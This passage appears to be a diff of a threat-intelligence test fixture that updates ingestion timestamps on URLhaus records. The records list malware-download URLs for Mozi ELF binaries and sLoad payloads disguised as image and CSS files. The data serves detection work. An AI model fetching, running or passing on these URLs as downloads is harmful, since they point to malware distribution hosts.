"{\"id\":\"961527\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961527/\",\"url\":\"http://89.160.20.156:55007/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1117,7 +1117,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024599400Z", + "ingested": "2021-12-14T14:56:15.726392899Z", "original": "{\"id\":\"961528\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961528/\",\"url\":\"http://89.160.20.156:51143/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1166,7 +1166,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024606700Z", + "ingested": "2021-12-14T14:56:15.726393371Z", "original": "{\"id\":\"961529\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961529/\",\"url\":\"http://89.160.20.156:41003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1214,7 +1214,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024613900Z", + "ingested": "2021-12-14T14:56:15.726393724Z", "original": "{\"id\":\"961524\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961524/\",\"url\":\"http://89.160.20.156:35739/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1262,7 +1262,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024621Z", + "ingested": "2021-12-14T14:56:15.726395275Z", "original": "{\"id\":\"961523\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961523/\",\"url\":\"http://89.160.20.156:45653/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1310,7 +1310,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024628Z", + "ingested": "2021-12-14T14:56:15.726395811Z", "original": "{\"id\":\"961520\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961520/\",\"url\":\"http://89.160.20.156:41349/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1358,7 +1358,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024635100Z", + "ingested": "2021-12-14T14:56:15.726396164Z", "original": "{\"id\":\"961521\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961521/\",\"url\":\"http://89.160.20.156:48586/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1406,7 +1406,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024642300Z", + "ingested": "2021-12-14T14:56:15.726396513Z", "original": "{\"id\":\"961522\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961522/\",\"url\":\"http://89.160.20.156:38111/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1454,7 +1454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024649400Z", + "ingested": "2021-12-14T14:56:15.726396869Z", "original": "{\"id\":\"961518\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961518/\",\"url\":\"http://89.160.20.156:34556/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1503,7 +1503,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024656400Z", + "ingested": "2021-12-14T14:56:15.726397294Z", "original": "{\"id\":\"961519\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961519/\",\"url\":\"http://89.160.20.156:59815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1553,7 +1553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024663400Z", + "ingested": "2021-12-14T14:56:15.726397703Z", "original": "{\"id\":\"961516\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961516/\",\"url\":\"http://89.160.20.156:50587/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -1602,7 +1602,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024670600Z", + "ingested": "2021-12-14T14:56:15.726398088Z", "original": "{\"id\":\"961517\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961517/\",\"url\":\"http://89.160.20.156:48322/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1650,7 +1650,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024677800Z", + "ingested": "2021-12-14T14:56:15.726398465Z", "original": "{\"id\":\"961515\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961515/\",\"url\":\"http://89.160.20.156:33317/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1698,7 +1698,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024685200Z", + "ingested": "2021-12-14T14:56:15.726398942Z", "original": "{\"id\":\"961513\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961513/\",\"url\":\"http://89.160.20.156:41516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1746,7 +1746,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024692200Z", + "ingested": "2021-12-14T14:56:15.726399428Z", "original": "{\"id\":\"961514\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961514/\",\"url\":\"http://89.160.20.156:57798/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1794,7 +1794,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024699500Z", + "ingested": "2021-12-14T14:56:15.726399786Z", "original": "{\"id\":\"961509\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961509/\",\"url\":\"http://89.160.20.156:47671/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1842,7 +1842,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024734400Z", + "ingested": "2021-12-14T14:56:15.726400145Z", "original": "{\"id\":\"961510\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961510/\",\"url\":\"http://89.160.20.156:57690/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1891,7 +1891,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024741400Z", + "ingested": "2021-12-14T14:56:15.726400507Z", "original": "{\"id\":\"961511\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961511/\",\"url\":\"http://89.160.20.156:50611/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -1939,7 +1939,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024748300Z", + "ingested": "2021-12-14T14:56:15.726400975Z", "original": "{\"id\":\"961512\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961512/\",\"url\":\"http://89.160.20.156:34141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1988,7 +1988,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024755300Z", + "ingested": "2021-12-14T14:56:15.726401379Z", "original": "{\"id\":\"961507\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961507/\",\"url\":\"http://89.160.20.156:44399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2037,7 +2037,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024762100Z", + "ingested": "2021-12-14T14:56:15.726401730Z", "original": "{\"id\":\"961508\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961508/\",\"url\":\"http://89.160.20.156:49120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2086,7 +2086,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024769100Z", + "ingested": "2021-12-14T14:56:15.726402093Z", "original": "{\"id\":\"961506\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961506/\",\"url\":\"http://89.160.20.156:51136/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2135,7 +2135,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024775800Z", + "ingested": "2021-12-14T14:56:15.726402451Z", "original": "{\"id\":\"961504\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961504/\",\"url\":\"http://89.160.20.156:45773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2184,7 +2184,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024782700Z", + "ingested": "2021-12-14T14:56:15.726402875Z", "original": "{\"id\":\"961505\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961505/\",\"url\":\"http://89.160.20.156:56528/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2233,7 +2233,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024791400Z", + "ingested": "2021-12-14T14:56:15.726403224Z", "original": "{\"id\":\"961500\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961500/\",\"url\":\"http://89.160.20.156:44427/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2282,7 +2282,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024798600Z", + "ingested": "2021-12-14T14:56:15.726403586Z", "original": "{\"id\":\"961501\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961501/\",\"url\":\"http://89.160.20.156:36134/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2331,7 +2331,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024805700Z", + "ingested": "2021-12-14T14:56:15.726403946Z", "original": "{\"id\":\"961502\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961502/\",\"url\":\"http://89.160.20.156:43973/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2380,7 +2380,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024812800Z", + "ingested": "2021-12-14T14:56:15.726404368Z", "original": "{\"id\":\"961503\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961503/\",\"url\":\"http://89.160.20.156:41319/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2429,7 +2429,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024819800Z", + "ingested": "2021-12-14T14:56:15.726404801Z", "original": "{\"id\":\"961496\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961496/\",\"url\":\"http://89.160.20.156:51847/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2478,7 +2478,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024826900Z", + "ingested": "2021-12-14T14:56:15.726405314Z", "original": "{\"id\":\"961497\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961497/\",\"url\":\"http://89.160.20.156:54469/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2527,7 +2527,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024833900Z", + "ingested": "2021-12-14T14:56:15.726405689Z", "original": "{\"id\":\"961498\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961498/\",\"url\":\"http://89.160.20.156:34547/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2576,7 +2576,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024840800Z", + "ingested": "2021-12-14T14:56:15.726406051Z", "original": "{\"id\":\"961499\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961499/\",\"url\":\"http://89.160.20.156:33932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2622,7 +2622,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024847800Z", + "ingested": "2021-12-14T14:56:15.726406432Z", "original": "{\"id\":\"961494\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961494/\",\"url\":\"https://univirtek.com/viro/02478080035/blank.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2668,7 +2668,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024854700Z", + "ingested": "2021-12-14T14:56:15.726406787Z", "original": "{\"id\":\"961495\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961495/\",\"url\":\"https://univirtek.com/viro/FRRNDR77C25D325O/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2714,7 +2714,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024861500Z", + "ingested": "2021-12-14T14:56:15.726407135Z", "original": "{\"id\":\"961492\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961492/\",\"url\":\"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2760,7 +2760,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024868500Z", + "ingested": "2021-12-14T14:56:15.726407505Z", "original": "{\"id\":\"961493\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961493/\",\"url\":\"https://letonguesc.com/leto/02328510512/logo.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2806,7 +2806,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024875500Z", + "ingested": "2021-12-14T14:56:15.726407964Z", "original": "{\"id\":\"961490\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961490/\",\"url\":\"https://cxminute.com/minu/MLILSN74B21E507L/uk.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2852,7 +2852,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024882300Z", + "ingested": "2021-12-14T14:56:15.726408374Z", "original": "{\"id\":\"961491\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961491/\",\"url\":\"https://cxminute.com/minu/12875710159/blank.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2898,7 +2898,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024892900Z", + "ingested": "2021-12-14T14:56:15.726408727Z", "original": "{\"id\":\"961489\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961489/\",\"url\":\"https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2944,7 +2944,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024900100Z", + "ingested": "2021-12-14T14:56:15.726409087Z", "original": "{\"id\":\"961488\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961488/\",\"url\":\"https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2990,7 +2990,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024907Z", + "ingested": "2021-12-14T14:56:15.726409465Z", "original": "{\"id\":\"961487\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961487/\",\"url\":\"https://belfetproduction.com/bella/01844510469/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3036,7 +3036,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024913900Z", + "ingested": "2021-12-14T14:56:15.726410161Z", "original": "{\"id\":\"961485\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961485/\",\"url\":\"https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3082,7 +3082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024920900Z", + "ingested": "2021-12-14T14:56:15.726410580Z", "original": "{\"id\":\"961486\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961486/\",\"url\":\"https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3128,7 +3128,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024927800Z", + "ingested": "2021-12-14T14:56:15.726411029Z", "original": "{\"id\":\"961482\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961482/\",\"url\":\"https://univirtek.com/viro/06389650018/it.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3174,7 +3174,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024934800Z", + "ingested": "2021-12-14T14:56:15.726411489Z", "original": 